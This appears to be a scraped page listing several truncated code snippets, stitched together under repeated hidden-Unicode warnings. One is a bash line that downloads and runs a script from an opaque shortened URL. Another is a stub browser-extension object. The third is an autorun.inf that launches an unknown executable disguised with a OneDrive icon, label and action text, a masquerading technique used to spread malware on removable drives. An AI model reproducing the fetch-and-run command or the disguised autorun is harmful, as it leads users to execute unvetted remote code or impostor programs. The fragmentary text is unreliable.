This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bash <(wget -O- http://goo.gl/8nCl35) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Extension information | |
var extension = { | |
name: "Test Extension", | |
description: "This is an example of an extension.", | |
version: "1.0" | |
}; | |
// Main function |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[AutoRun] | |
OPEN=Sync\SyncDriver.TrayIcon.exe | |
ICON=Sync\OneDrive.ico | |
ACTION=Start OneDrive Sync | |
LABEL=OneDrive |
NewerOlder